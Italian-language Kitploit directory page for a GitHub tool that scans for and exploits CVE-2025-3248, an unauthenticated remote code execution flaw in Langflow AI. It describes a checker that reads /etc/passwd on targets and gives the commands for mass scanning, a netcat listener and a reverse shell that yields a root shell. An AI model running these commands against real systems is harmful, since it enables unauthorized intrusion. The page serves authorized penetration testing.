Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3248 — Scanner ed exploit per CVE-2025-3248, una RCE non autenticata in Langflow AI. Include un controllo vulnerabilità e un generatore di payload reverse shell per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/r0otk3r/cve-2025-3248
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

Scanner ed exploit per CVE-2025-3248, una RCE non autenticata in Langflow AI. Include un controllo vulnerabilità e un generatore di payload reverse shell per test di sicurezza autorizzati.

131 anno faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-3248: Langflow - Esecuzione Remota di Codice (RCE) non autenticata

Questa repository contiene due script Python:

  • LangflowCheck.py: Uno scanner che verifica la presenza di istanze Langflow AI vulnerabili a CVE-2025-3248.
  • exploit.py: Un exploit funzionante per reverse shell su target Langflow vulnerabili.

Riepilogo

CVE-2025-3248 è una vulnerabilità critica in Langflow AI che consente ad attaccanti non autenticati di eseguire codice Python arbitrario da remoto tramite un payload appositamente costruito inviato a /api/v1/validate/code.


File

LangflowCheck.py

  • Verifica se un target è vulnerabile tentando di eseguire un payload inoffensivo che legge /etc/passwd.
  • Può scansionare un singolo target o una lista di URL.
  • Supporta l'output dei target vulnerabili in un file.
  • exploit.py

    • Invia un payload reverse shell all'endpoint vulnerabile.
    • Richiede l'IP dell'attaccante (lhost) e la porta del listener (lport).
    • Registra l'attività in exploit.log.
    • Supporta il controllo del listener prima di inviare il payload.

    Utilizzo

    1. Installare i requisiti

    root@kitploit:~
    pip install -r requirements.txt
    

    2. Eseguire lo scanner di vulnerabilità

    Singolo URL

    root@kitploit:~
    python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
    

    1

    Target multipli

    root@kitploit:~
    python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
    

    tt

    3. Sfruttare un target

    Per prima cosa, avviare un listener

    root@kitploit:~
    sudo nc -nvlp 4444
    

    l

    Quindi, eseguire l'exploit:

    root@kitploit:~
    python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
    

    2

    Se il target è vulnerabile, si dovrebbe ricevere una shell. root

    ⚠️ Disclaimer

    Questo exploit è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. Non utilizzarlo contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicito permesso di test.


    Canali Ufficiali

    • YouTube @rootctf
    • X @r0otk3r
    Scarica lo strumento